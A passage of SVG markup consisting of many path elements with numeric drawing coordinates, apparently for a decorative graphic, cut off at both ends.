d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path 